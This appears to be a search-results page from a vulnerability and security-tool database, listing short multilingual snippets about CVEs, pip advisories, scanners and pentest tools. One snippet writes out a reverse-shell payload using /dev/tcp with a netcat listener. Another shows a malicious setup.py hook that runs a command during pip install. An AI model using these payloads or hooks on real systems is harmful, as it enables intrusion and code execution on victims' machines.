1323 matches found
metashield-clean-up-sdk-python
Metashield-clean-up-sdk-python Instalação Instale o pacote metashieldcleanup usando pip:: root@kitploit: pip install metashieldcleanup Uso Exemplo para limpar um arquivo. .. code-block:: python root@kitploit: import time import base64 from metashieldcleanup.api import MetashieldCleanUp api =...
CVE-2026-0848-Scanner---Herramienta-de-Detecci-n
🔍 CVE-2026-0848 Scanner Erkennungstool für die Schwachstelle CVE-2026-0848 in NLTK Ausführung beliebigen Codes in StanfordSegmenter. ⚡ Installation root@kitploit: git clone https://github.com/tu-usuario/CVE-2026-0848-Scanner.git cd CVE-2026-0848-Scanner pip install -r requirements.txt...
SuricataLog
SuricataLog Quando ho iniziato a imparare come usare Suricata, ho subito scoperto che avevo bisogno di uno strumento per ispezionare il file eve.json; la maggior parte dei tutorial e della documentazione in circolazione suggeriva di installare uno stack per svolgere le seguenti attività: 1...
CVE-2021-21425
CVE-2021-21425 Quelle: https://www.exploit-db.com/exploits/49973 1 Ziel-IP ändern 2 Payload ändern echo -ne "bash -i & /dev/tcp/OUR-IP/80 0&1" | base64 -w0 3 sudo nc -lvnp 80 4 python3 exploit.py...
CVE-2021-3572
CVE-2021-3572 Questo repository è progettato per testare CVE-2021-3572 in pypa/pip. Per maggiori informazioni, vedi queste risorse: Pagina CVE: https://vulners.com/cve/CVE-2021-3572 PR in cui è stata corretta la vulnerabilità: https://github.com/pypa/pip/pull/9827 Issue con ulteriore discussione:...
pymultitor
PyMultiTor Python Multi Threaded Tor Proxy, Did you ever want to be at two different places at the same time? When I asked myself this question, I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that bloc...
metame
metame metame is a simple metamorphic code engine for arbitrary executables. From Wikipedia: Metamorphic code is code that when run outputs a logically equivalent version of its own code under some interpretation. This is used by computer viruses to avoid the pattern recognition of anti-virus...
subdomain3
Subdomain3 README.md inChinese 中文 Description Subdomain3 is a new generation of tool , It helps penetration testers to discover more information in a shorter time than other tools.The information includes subdomains, IP, CDN, and so on. Please enjoy it. Screenshot medium pattern for speed Feature...
autovpn
!CAUTION This repository is no longer being maintained. No further updates, bug fixes, or support will be provided. Please use the new version https://github.com/ttlequals0/autowire Overview Script that allows the easy creation of OpenVPN endpoints in any AWS region. To create a VPN endpoint is...
pip-audit
pip-audit pip-audit è uno strumento per scansionare ambienti Python alla ricerca di pacchetti con vulnerabilità note. Utilizza il Python Packaging Advisory Database https://github.com/pypa/advisory-database tramite l'API JSON di PyPI come fonte di report di vulnerabilità. Questo progetto è...
hostintel
hostintel This tool is used to collect various intelligence sources for hosts. Hostintel is written in a modular fashion so new intelligence sources can be easily added. Hosts are identified by FQDN host name, Domain, or IP address. This tool only supports IPv4 at the moment. The output is in CSV...
fibratus
Fibratus Security sensor for realtime threat detection and protection Get Started » Docs • Rules • Filaments • Download • Discussions Fibratus detects and eradicates advanced attacker tradecraft, malware, and emerging threats by scrutinizing and asserting a wide spectrum of system events against ...
CVE-2009-0347
Badge Licenza MIT Installazione 1. Installa Python3 e pip Istruzioni qui Se non riesci a capirlo, non dovresti usare questo strumento Installa tramite pip root@kitploit: pip install CVE-2009-0347 Esegui il comando seguente per verificare CVE-2009-0347 -h Configurazioni 2. Abbiamo integrato l'API ...
pmg
Package Manager Guard PMG Schädliche npm- und pip-Pakete blockieren, bevor sie installiert werden. Verteidigung in der Tiefe für die Paketmanager, die Sie bereits verwenden. Warum PMG? Entwickler und KI-Codierungsagenten installieren täglich Pakete. Jedes npm install oder pip install führt Tausen...
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-
CVE-2026-21016 – Hook di installazione di pacchetti PyPI dannosi esecuzione di setup.py Codice del programma Python root@kitploit: setup.py - Malicious package that executes during install from setuptools import setup import os This runs on pip install os.system'id /tmp/pwnedbypackage' setup...
kubestriker
A Blazing fast Security Auditing tool for kubernetes!!...
adidnsdump
Active Directory Integrated DNS dump tool By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. For mo...
ROOT-OS-DEBIAN-12-CVE-2025-8869 CVE-2025-8869 in python-pip - Patched by Root
Root has patched CVE-2025-8869 in the python-pip package for Root:Debian:12. Multiple fixed versions available...
ROOT-OS-DEBIAN-12-CVE-2018-20225 CVE-2018-20225 in python-pip - Patched by Root
Root has patched CVE-2018-20225 in the python-pip package for Root:Debian:12. Multiple fixed versions available...
apkleaks
APKLeaks Scanning APK file for URIs, endpoints & secrets. Installation from Pypi from Source from Docker Usage Options Output Pattern Arguments for disassembler License Acknowledments Installation It's fairly simple to install APKLeaks : from PyPi root@kitploit: $ pip3 install apkleaks from Sourc...